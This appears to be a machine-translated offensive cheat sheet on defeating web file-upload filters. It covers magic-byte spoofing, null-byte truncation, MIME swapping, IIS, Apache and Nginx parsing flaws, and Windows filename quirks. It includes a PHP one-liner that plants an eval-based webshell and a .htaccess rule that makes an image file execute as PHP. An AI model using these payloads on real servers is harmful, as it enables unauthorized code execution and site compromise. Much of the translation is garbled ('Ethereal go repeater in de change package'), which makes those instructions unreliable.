First, the file filter method
Header Checksum: JPEG ==> FF D8 FF E0, PNG ==> 89 50 4E 47 0D 0A 1A 0A
File types check: HTTP header content / type, media type, also called a MIME type.
HTML文档标记: text/html;
普通ASCII文档标记: text/html;
JPEG图片标记: image/jpeg;
GIF图片标记: image/gif;
js文档标记: application/javascript;
xml文件标记: application/xml;
较全的网址
https://www.runoob.com/http/http-content-type.htmlFile suffix check: .jpeg .txt .png
Second, the conventional method of bypassing
2.1 header spoofing, bypassing simple waf
Upload a file a.jpg might just change the extension, but not the real picture in the sense of how to get away?
It is added at the beginning of a gif89a
2.2 exploit vulnerabilities filepath
A.gif upload a file:
Ethereal go repeater in de change package:
1. Change the path of the file upload: /a.asp/
2. change the file name: /a.asp ;. (in conjunction with the type of vulnerability)
2.3 00 cut
Upload a a.php
Ethereal go repeater in de change package:
1. Change the filename is: a.jpg,
2. reform path, aa.php (finally add a space, easy to find)
Then go find the path in Hex, the space (20) later changed to 00
Either directly instead a.php% 00jpg, right-click to select 00%, to convertselection-URL-url-decode
2.4 MIME bypass
Change the content-type, upload a real a.jpg
Ethereal go repeater in de change package:
The image / jpeg changed to text / asp
The original picture content into a word Trojan
2.5 form submission
Sometimes pages have to upload files, but no submit button,
Right view elements on a page, put this code plus
<input type= "submit" value= "提交" name= "bb">
A.asa upload files, capture
2.4 Editor use
Editor vulnerability finishing: https: //blog.csdn.net/u011781521/article/details/59057759
Third, resolve vulnerabilities
3.1 iis 6.0 Parsing Vulnerability
(1) directory parsing vulnerability /xx.asp/xx.jpg
Create a folder .asp format in the web root directory, any file extension in its catalog (popular graphic horse) are as iis asp files to parse and execute.
(2) file parsing xx.asp; .jpg
In IIS6.0, the semicolon is not resolved, so xx.asp; .jpg asp script is interpreted as to be performed.
(3) parsing the file type asa / cer / cdx
iis6.0 default executable file also contains in addition to the three asp asa, cer, cdx.
3.2 Apache Parsing Vulnerability
Apache to parse files from right to left to start the main judge, if it is determined the type can not be resolved, continue to the left
to parse, such as xx.php.wer.xxxxx will be interpreted as PHP type (write PHP horse).
3.3 IIS 7.0 / Nginx <8.03 deformity Parsing Vulnerability
(1) upload name in the default Fast-CGI open position as xx.jpg, says:
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>Then visit xx.jpg / .php, it will generate a word Trojan shell.php in this directory.
(2) Another Nginx file parsing vulnerability is from left to right
You can bypass the restrictions on the file extension, but also upload Trojan files, so you can upload XXX.jpg.php
3.4 .htaccess file parsing
If Apache in .htaccess can be executed and can be uploaded, you can attempt to write in .htaccess:
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>Then upload shell.jpg Trojans, so shell.jpg can be parsed as PHP files.
3.5 operating system file with the command rule
(1) does not meet the windows to upload files naming the file name
the Test.asp.
The Test.asp (space)
test.php: 1.jpg
test.php :: $ the DATA
will be automatically removed windows system does not comply with the rules of the contents of the back of the sign .